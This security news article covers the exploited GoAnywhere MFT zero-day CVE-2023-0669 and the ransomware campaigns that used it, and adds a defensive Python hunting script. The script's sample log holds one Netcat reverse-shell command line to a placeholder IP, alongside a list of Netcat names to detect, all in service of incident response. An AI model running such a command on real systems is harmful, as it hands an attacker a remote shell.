Fortra’s GoAnywhere MFT utility exploited in ransomware attacks
Fortra has disclosed a zero-day remote code execution (RCE) vulnerability in its GoAnywhere MFT utility that ransomware actors have been actively exploiting to steal sensitive data.
CVE-2023-0669 (CVSS score: 7.2) is a high-severity pre-authentication command injection flaw that can be abused for code execution; it lies in the product’s License Response Servlet, which deserializes attacker-supplied data before any authentication takes place. Fortra patched it in version 7.1.2 in February 2023, but by then it had already been weaponized as a zero-day since January 18, 2023.
On January 30, 2023, Fortra said it had become aware of suspicious activity affecting certain file-transfer instances. An unauthorized party had used CVE-2023-0669 to create unauthorized user accounts in some MFTaaS (Managed File Transfer as a Service) customer environments and, according to the company, then used those accounts to download files from the hosted MFTaaS environments of some of those customers.
Between January 28 and January 31, the attackers also deployed two further tools, “Netcat” and “Errors.jsp.” Not every installation attempt succeeded, but the vulnerability was exploited against a number of on-premises GoAnywhere MFT instances running a particular configuration.
Fortra said it has notified the affected customers directly and has found no evidence of unauthorized access to customer systems that were provisioned with a “clean and secure MFTaaS environment.” To contain the incident, it recommends that customers rotate the Master Encryption Key, reset all credentials, review audit logs, and delete any suspicious administrator or user accounts.
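One way to turn the indicators above into a hunt across an environment that was exposed during the exploitation window, as an added example that is not from the original article or from Fortra: the script below runs over a constructed audit log and web-root listing (the CSV layout, event names, account names, paths and IP address are all invented for this example and do not reproduce GoAnywhere’s real log format) and flags accounts created between January 18 and January 31, 2023, Netcat executions, a dropped Errors.jsp, and the files downloaded by the flagged accounts.

```python
"""Hunt for the post-exploitation indicators named in the text over a
constructed audit log: accounts created inside the exploitation window,
Netcat execution, a dropped Errors.jsp, and downloads by the new accounts.
The log format is invented for the example; it is not GoAnywhere's own."""
from __future__ import annotations

import csv
import io
from datetime import datetime, timezone
from pathlib import PurePosixPath

# Exploitation window from the text: zero-day abuse from January 18,
# Netcat/Errors.jsp activity through January 31, 2023.
WINDOW_START = datetime(2023, 1, 18, tzinfo=timezone.utc)
WINDOW_END = datetime(2023, 1, 31, 23, 59, 59, tzinfo=timezone.utc)

# Indicators named in the text. Assumption: the Netcat binary kept one of
# its conventional names; rename-resistant detection is out of scope here.
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe"}
DROPPED_FILES = {"errors.jsp"}

# Constructed sample log, NOT real GoAnywhere output. Columns:
# timestamp (UTC ISO-8601), event type, acting user, key=value details.
SAMPLE_LOG = """\
timestamp,event,actor,detail
2023-01-10T09:12:00Z,USER_CREATE,admin,user=jsmith;role=user
2023-01-19T02:41:13Z,USER_CREATE,system,user=svc_backup2;role=admin
2023-01-19T02:42:07Z,LOGIN,svc_backup2,src=203.0.113.45
2023-01-19T02:45:30Z,FILE_DOWNLOAD,svc_backup2,path=/shared/finance/q4.xlsx
2023-01-29T23:05:51Z,PROCESS_EXEC,svc_backup2,exe=/tmp/nc;args=-e /bin/sh 203.0.113.45 4444
2023-02-03T10:00:00Z,USER_CREATE,admin,user=newhire;role=user
"""

# Constructed listing of the web root, as a directory walk would return it.
SAMPLE_WEBROOT = [
    "/opt/goanywhere/webapps/ROOT/index.jsp",
    "/opt/goanywhere/webapps/ROOT/Errors.jsp",
    "/opt/goanywhere/webapps/ROOT/WEB-INF/web.xml",
]


def parse_log(text: str) -> list[dict]:
    """Parse the constructed CSV log; adds a datetime and a parsed detail map."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["ts"] = datetime.fromisoformat(row["timestamp"].replace("Z", "+00:00"))
        row["fields"] = dict(kv.split("=", 1) for kv in row["detail"].split(";") if "=" in kv)
        rows.append(row)
    return rows


def _in_window(ts: datetime) -> bool:
    return WINDOW_START <= ts <= WINDOW_END


def accounts_created_in_window(events: list[dict]) -> list[str]:
    """Accounts created while the zero-day was being exploited: the
    'suspicious admin or user accounts' the advisory says to delete."""
    return [e["fields"]["user"] for e in events
            if e["event"] == "USER_CREATE" and _in_window(e["ts"])]


def netcat_executions(events: list[dict]) -> list[dict]:
    """Process launches whose executable basename is a Netcat variant."""
    hits = []
    for e in events:
        if e["event"] != "PROCESS_EXEC":
            continue
        exe = PurePosixPath(e["fields"].get("exe", "")).name.lower()
        if exe in NETCAT_NAMES:
            hits.append({"ts": e["timestamp"], "actor": e["actor"], "exe": exe})
    return hits


def dropped_jsp_files(paths: list[str]) -> list[str]:
    """Files in the web root whose name matches the dropped-file indicator."""
    return [p for p in paths if PurePosixPath(p).name.lower() in DROPPED_FILES]


def downloads_by(events: list[dict], users: list[str]) -> list[str]:
    """Files pulled by the suspicious accounts, to scope what was stolen."""
    wanted = set(users)
    return [e["fields"]["path"] for e in events
            if e["event"] == "FILE_DOWNLOAD" and e["actor"] in wanted]


def triage(log_text: str, webroot: list[str]) -> dict:
    """Run every check and return one findings dict for the responder."""
    events = parse_log(log_text)
    suspicious = accounts_created_in_window(events)
    return {
        "suspicious_accounts": suspicious,
        "netcat": netcat_executions(events),
        "dropped_files": dropped_jsp_files(webroot),
        "exfiltrated": downloads_by(events, suspicious),
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_LOG, SAMPLE_WEBROOT).items():
        print(f"{key}: {val}")
```

The window-based account check is deliberately broad: any account created while the bug was exploitable is reviewed, and legitimate creations are cleared by hand rather than filtered out automatically, since the attacker-created accounts in the incident were indistinguishable from normal ones except by timing and subsequent behaviour. The download list produced for those accounts is what scopes the data-theft notification the advisory implies.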
In a related development, Malwarebytes and NCC Group observed a surge in ransomware attacks in March 2023, driven largely by active exploitation of the GoAnywhere MFT vulnerability: 459 attacks were recorded that month, a 91% increase over February 2023 and a 62% increase over March 2022.
Cl0p, a ransomware-as-a-service (RaaS) operation, was the most active threat actor after exploiting the GoAnywhere flaw, accounting for 129 victims. Royal, BlackCat, Play, Black Basta, and BianLian were also prominent. Cl0p had already breached many organizations in late 2020 and early 2021 by exploiting zero-day vulnerabilities in the Accellion File Transfer Appliance (FTA), another file-transfer product.
The sources for this piece include an article in TheHackerNews.